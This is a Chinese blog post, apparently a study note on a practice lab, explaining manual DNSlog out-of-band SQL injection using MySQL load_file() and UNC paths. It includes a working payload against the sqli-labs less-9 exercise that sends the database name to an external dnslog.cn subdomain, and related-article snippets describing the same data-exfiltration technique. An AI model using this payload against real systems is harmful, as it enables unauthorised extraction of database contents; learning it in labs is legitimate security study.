SQL注入——DNSlog手动注入

最新推荐文章于 2024-03-18 00:36:47 发布
最新推荐文章于 2024-03-18 00:36:47 发布
阅读量343 收藏 1
点赞数
分类专栏: owasp十大漏洞学习 文章标签: sql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyingcheng/article/details/129469218
版权

目录

一,关键函数

二,UNC路径

三,需要用到的网站

四,注入

手动注入对waf的绕过有很大的帮助,但是效率比较低。

DNSlog手动注入的条件和文件上传注入一样,也需要mysql有文件的读写权限。

一,关键函数

load_file()

读取本机或者是在网络上共享出来的一些文件

二,UNC路径

格式:\severname\sharename,其中severname是服务器名,sharename是共享资源的名称。

三,需要用到的网站

http://www.dnslog.cn/

 获取随机分配的域名:

可以在前面加东西进行访问: 

 然后我们在dnslog上点击refresh可以看到dns解析的日志信息:

 

四,注入

简单点说他的原理就是,在DNS解析域名之前现在它执行我想让他执行的数据库的命令。

在这里我们以时间盲注less-9为例:

?id=1 and (select load_file(concat("//",(select database()),".snen4t.dnslog.cn//hyc.txt"))) 

 

可以看到页面并没有响应,但是去查看dnslog中的日志:

实际上域名前面会显示database是security的呜呜呜但是不知道为什么没有显示,先放在这里吧...

 

 

 

 

是小何不是小盒呀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 690
SQL注入——DNSlog注入
DNSLog注入SQLmap工具使用
最新发布
2301_80034711的博客
03-18 821
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLogSqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
SQL注入DnsLog注入
qq_52310755的博客
03-22 1881
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
DNS_LOG注入
学习、分享、交流
05-19 1523
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
DNS-log注入(zkaq靶场)
v2ish1yan的博客
04-21 1272
DNS-log注入
SQL注入-DNSlog注入(手工加工具使用)
BING
04-17 6573
DNSlog注入
sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 878
sqlmap渗透进阶】DNS-domain注入
SQL DNSlog注入详解
永远是少年
08-07 1303
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
sql注入sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 1892
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1756
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2630
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值